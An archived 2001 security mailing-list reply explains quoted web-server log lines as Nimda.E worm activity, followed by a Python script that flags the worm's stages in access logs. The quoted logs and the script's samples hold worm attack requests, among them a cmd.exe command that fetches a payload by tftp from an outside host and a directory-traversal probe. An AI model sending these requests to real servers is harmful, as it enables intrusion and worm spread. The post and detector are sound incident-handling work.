On Mon, 29 Oct 2001, Aj Effin Reznor wrote:

> [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
> [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
> [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"

As someone pointed out, this is Nimda.E. What's going on here is that since your web server is responding with a 200 to the exploit attempt, it thinks it has found a vulnerable victim. So it issues the tftp command to try and make your web server download a copy. Then it sends a command to try to execute the file it thinks it has caused you to download.

Ryan

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
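The three-stage sequence Ryan describes (cmd.exe probe, tftp fetch of the worm body, request for the dropped file) can be picked out of an access log mechanically. The following is an added example, not code from the original post or from any SecurityFocus tool: it parses Apache combined-format lines, decodes the URL-encoded command string, records which file the tftp command tried to drop, and then flags a later request for that same filename from the same client as the execution attempt. The log lines are constructed to mirror the ones quoted above; the client and tftp-server addresses are RFC 5737 documentation addresses, not real hosts, and the combined log format is an assumption (the quoted lines had their leading fields stripped).

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample log, modeled on the Nimda probe sequence quoted in the post.
# Addresses are documentation addresses (198.51.100.0/24, 203.0.113.0/24, 192.0.2.0/24).
SAMPLE_LOG = """\
198.51.100.7 - - [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
198.51.100.7 - - [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
198.51.100.7 - - [29/Oct/2001:17:09:19 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
203.0.113.9 - - [29/Oct/2001:17:10:01 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
203.0.113.9 - - [29/Oct/2001:17:12:44 -0800] "GET /index.html HTTP/1.0" 200 1500 "-" "-"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)
# The worm's download step: tftp -i <host> GET <remote file> <local path>
TFTP_RE = re.compile(
    r'tftp\s+-i\s+(?P<host>\S+)\s+GET\s+(?P<remote>\S+)\s+(?P<local>\S+)', re.IGNORECASE
)


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "client": m.group("client"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        # decode %xx in the path so ..%c1%1c.. style traversal still ends in cmd.exe
        "path": unquote(path).lower(),
        # '+' and %20 both mean a space in the command string passed to cmd.exe
        "query": unquote_plus(query),
    }


def classify(req, dropped):
    """Map a request to a worm stage. `dropped` remembers, per client, the filenames
    that earlier tftp commands tried to write onto the server."""
    base = req["path"].rsplit("/", 1)[-1]
    if base in ("cmd.exe", "root.exe"):
        tm = TFTP_RE.search(req["query"])
        if tm:
            # local path is a Windows path such as c:\httpodbc.dll; keep only the basename
            local = tm.group("local").replace("\\", "/").rsplit("/", 1)[-1].lower()
            dropped.setdefault(req["client"], set()).add(local)
            return "tftp_download", tm.group("host")
        return "cmd_probe", req["query"]
    if base in dropped.get(req["client"], ()):
        # a request for the file the worm just tried to drop is the execution attempt
        return "execute_dropped", base
    return None, None


def scan(log_text):
    """Scan a log and return the Nimda-style stages seen, in log order."""
    dropped = {}
    findings = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        stage, detail = classify(req, dropped)
        if stage is None:
            continue
        findings.append({
            "client": req["client"],
            "ts": req["ts"],
            "stage": stage,
            "detail": detail,
            "status": req["status"],
            # a 2xx on the probe is what convinces the worm it found a victim,
            # which is why it escalates to the tftp stage against a 200-for-everything server
            "looks_vulnerable": req["status"] // 100 == 2,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['client']:14} {f['stage']:16} status={f['status']} "
              f"escalation_likely={f['looks_vulnerable']} {f['detail']}")
```

On the constructed sample the first client walks all three stages and its probe was answered with a 200, matching the situation in the post; the second client is a bare probe that got a 404, which is the response that would have stopped the escalation.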
This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:41:08 PST